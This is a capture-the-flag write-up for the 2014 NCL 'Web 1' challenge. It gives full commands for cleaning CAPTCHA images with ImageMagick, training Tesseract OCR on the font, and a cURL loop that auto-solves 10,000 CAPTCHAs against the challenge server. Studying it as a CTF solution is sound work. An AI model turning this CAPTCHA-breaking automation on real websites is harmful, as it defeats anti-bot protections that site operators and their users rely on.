
2014 NCL Post Season Web 1 CAPTCHA Solution

The following solution is for the 2014 NCL Post Season event’s “Web 1” flag.

Requires:
Tesseract OCR v3.02
ImageMagick
cURL
Bash

On Ubuntu 14.04 the Tesseract package exists but, due to a packaging error, it includes none of the training tools, so compiling from source is necessary. Compiling Tesseract 3.02 from source also requires downloading and compiling Leptonica 1.70. Compilation instructions can be found here: https://code.google.com/p/tesseract-ocr/wiki/Compiling
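Before going further, it may be worth confirming that every tool used in this write-up is on the PATH, including the training tools that the Ubuntu package leaves out. The following is a minimal sketch; `missing_tools` is a hypothetical helper name, and the tool list in the usage comment is simply collected from the commands that appear later in this post.

```shell
#!/usr/bin/env bash
# missing_tools NAME...: print each command name that cannot be found on the PATH.
# This is a hypothetical helper, not part of Tesseract, ImageMagick, or cURL.
missing_tools() {
  local tool
  for tool in "$@"; do
    command -v "$tool" >/dev/null 2>&1 || printf '%s\n' "$tool"
  done
}

# Usage (prints nothing when everything is installed):
# missing_tools tesseract convert display curl unicharset_extractor \
#   shapeclustering mftraining cntraining combine_tessdata
```

If any of the training tools are listed, the packaged Tesseract is probably the incomplete one and a source build is needed.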

Cleaning up the CAPTCHA with ImageMagick is fairly easy once you discover that the dark lines and noise can be eliminated with just two commands:

# remove the dark lines
convert captcha.png -opaque '#404040' cleaned_captcha.png
# remove blue noise
convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png

Now that the image is cleaned up, it is time for the OCR. With the default English training files, Tesseract recognized the CAPTCHA’s font with about 90-95% accuracy. That yields only 10-20 successful results, with another 9,980 or so still to go, before a miss resets the counter back to zero. It is time to train Tesseract for the CAPTCHA font.
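The 10-20 figure lines up with simple arithmetic. Assuming each CAPTCHA is solved independently with probability p (an assumption, since real OCR errors may be correlated), the average run of successes before the first miss is p / (1 - p), which is about 9 at 90% and 19 at 95%. The chance of 10,000 in a row is p^10000, which at 95% is on the order of 10^-223. A rough sketch of that calculation, with hypothetical function names:

```shell
# expected_streak P: average number of consecutive successes before the first
# failure, assuming independent attempts with success probability P (P < 1).
expected_streak() {
  awk -v p="$1" 'BEGIN { printf "%.0f\n", p / (1 - p) }'
}

# streak_probability P N: chance of N successes in a row, i.e. P^N,
# computed as exp(N * log(P)).
streak_probability() {
  awk -v p="$1" -v n="$2" 'BEGIN { printf "%.3g\n", exp(n * log(p)) }'
}

expected_streak 0.90   # prints 9
expected_streak 0.95   # prints 19
```

Running `streak_probability 0.95 10000` shows why the default training files were never going to be enough on their own.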

Training Tesseract OCR is a manual, multi-step process if you don’t have the font. With the font available, there is an automated solution. In this case, the font could not be found. Using ImageMagick’s convert utility to append 20-30 of the cleaned-up CAPTCHAs vertically lets you train on the most characters at one time. The first step in training is to create a box file from a TIF of failed CAPTCHAs. I explain later how to append them together.

tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 batch.nochop makebox

Using the utility Cowboxer (works in WINE), I was able to edit the box file and fix any mistakes Tesseract made. Now it is time to train Tesseract using the corrected box file.

tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 box.train

Now it is only a matter of running several other commands and copying the combined result file to the tessdata directory. For brevity’s sake I won’t describe what the commands do. More information can be found here: https://code.google.com/p/tesseract-ocr/wiki/TrainingTesseract3

echo "captcha 0 0 0 0 0" > font_properties

unicharset_extractor eng.captcha.exp0.box

# for the 2nd training session onward, include the previous box files
# unicharset_extractor eng.captcha.exp0.box eng.captcha.exp1.box eng.captcha.exp2.box

shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr

mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr

cntraining eng.captcha.exp0.tr

# for the 2nd training session onward, include the previous training files
# shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
# mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
# cntraining eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr

mv shapetable eng.shapetable
mv inttemp eng.inttemp
mv pffmtable eng.pffmtable
mv normproto eng.normproto
combine_tessdata eng.
cp eng.traineddata /usr/local/share/tessdata
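As the commented lines above show, every later training session has to pass all earlier box and training files again. One way to avoid typing the growing list by hand is sketched below. `session_files` is a hypothetical helper; it only builds file names that follow the eng.captcha.expN pattern used above and does not call any Tesseract tool itself.

```shell
# session_files EXT LAST: print the file names for training sessions 0..LAST
# on one line, separated by spaces (hypothetical helper).
session_files() {
  ext=$1
  last=$2
  n=0
  list=""
  while [ "$n" -le "$last" ]; do
    list="$list eng.captcha.exp${n}.${ext}"
    n=$((n + 1))
  done
  # drop the leading space left by the first concatenation
  printf '%s\n' "${list# }"
}

# Usage for a third session (exp0..exp2). The command substitutions are left
# unquoted on purpose so that each file name becomes its own argument:
# unicharset_extractor $(session_files box 2)
# mftraining -F font_properties -U unicharset -O eng.unicharset $(session_files tr 2)
# cntraining $(session_files tr 2)
```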

After the first training session, retraining Tesseract OCR on the failed CAPTCHAs, appended into a single image, helps improve accuracy.

# append failed CAPTCHAs vertically for training
convert failed*.png -append eng.captcha.exp0.png

# resize to 1000 pixel width while maintaining aspect ratio
convert eng.captcha.exp0.png -resize 1000 eng.captcha.exp0.tif

After a few training sessions, the failure rate was much lower, but still not low enough to reach 10,000 consecutive correct outputs. During training on the appended failures, however, there were no errors. To emulate those conditions, the current CAPTCHA has to be appended with additional ones before it is run through Tesseract. Then just pipe the output through the ‘tr’ and ‘cut’ commands to keep only the current CAPTCHA’s characters.

CAPTCHA=$(tr -d ' \n' < ocr_captcha_result.txt | cut -c 1-6)
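To see what the pipeline above does, here is a small self-contained sketch that runs it against made-up OCR output. The sample text is hypothetical; the six-character length comes from the `cut -c 1-6` in the command above, and the current CAPTCHA is assumed to be the first one in the appended image.

```shell
# first_captcha FILE: delete every space and newline from the OCR output, then
# keep the first six characters, which belong to the CAPTCHA at the top of the image.
first_captcha() {
  tr -d ' \n' < "$1" | cut -c 1-6
}

# Hypothetical OCR output: the current CAPTCHA followed by two padding CAPTCHAs,
# with a stray space of the kind Tesseract sometimes inserts.
sample=$(mktemp)
printf 'aB3 dE9\nXy7Qp2\nmN4kL8\n' > "$sample"
first_captcha "$sample"   # prints aB3dE9
rm -f "$sample"
```

Because the spaces and line breaks are removed before cutting, a space in the middle of the first line does not shorten the result.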

With Tesseract trained, it is now time to automate grabbing the CAPTCHAs and decoding them.

for i in {0..10001}
do
  if [ ${i} -lt 1 ]; then
    # start the session
    curl -b cookies.txt -c cookies.txt -k \
      --data "username=user&password=test" \
      https://23.23.158.181/signup.php
    continue;
  fi

  # submit captcha ocr value to server
  curl -b cookies.txt -c cookies.txt -k -X POST \
    --data "input=${CAPTCHA}&flag=1&submit=submit" \
    https://23.23.158.181/main.php

  # download new captcha from server
  curl -b cookies.txt -c cookies.txt -k \
    https://23.23.158.181/captcha.png > captcha.png

  # remove the dark lines
  convert captcha.png -opaque '#404040' cleaned_captcha.png

  # remove blue noise
  convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png

  # append other cleaned captchas vertically to improve ocr accuracy
  convert cleaned_captcha.png \
    additional_captcha.png \
    additional_captcha_2.png \
    -append ocr_captcha.png

  # increase size for ocr accuracy
  convert ocr_captcha.png -resize 1000 final_ocr_captcha.tif

  # run captcha through tesseract ocr
  tesseract -psm 6 final_ocr_captcha.tif ocr_captcha_result

  # clean up and grab only first captcha values
  CAPTCHA=$(tr -d ' \n' < ocr_captcha_result.txt | cut -c 1-6)
done

At this point, you should be well on your way to 10,000 consecutive CAPTCHA form submissions. If some CAPTCHAs still fail, adding the following code to the form submission step should help identify and save them for additional training.

# submit captcha ocr value to server
curl -b cookies.txt -c cookies.txt -k -X POST \
  --data "input=${CAPTCHA}&flag=1&submit=submit" \
  https://23.23.158.181/main.php > flagdata.txt

if grep -Fq "You have failed" flagdata.txt
then
  echo "Failed captcha ${CAPTCHA}"

  cp captcha.png "failed-${CAPTCHA}.png"

  # will display the failed CAPTCHA using Image Magick's display command and keep the script running
  # comment this if experiencing a high failure rate
  display "failed-${CAPTCHA}.png" &
fi
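The failure check can also be tried offline against a saved response before it is wired into the loop. The sketch below wraps the same grep in a function; `captcha_failed` is a hypothetical name, and the only thing assumed about the server’s response is the "You have failed" text already used above.

```shell
# captcha_failed FILE: exit status 0 when the saved server response contains
# the failure message, non-zero otherwise (hypothetical helper).
captcha_failed() {
  grep -Fq "You have failed" "$1"
}

# Usage inside the loop, after saving the response to flagdata.txt:
# if captcha_failed flagdata.txt; then
#   cp captcha.png "failed-${CAPTCHA}.png"
# fi
```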

The looping video below shows CAPTCHAs 9997, 9998, 9999, and 10000 being solved:

Flag: MyVisionIs2020

Written and Solved by Ryan Lavelle
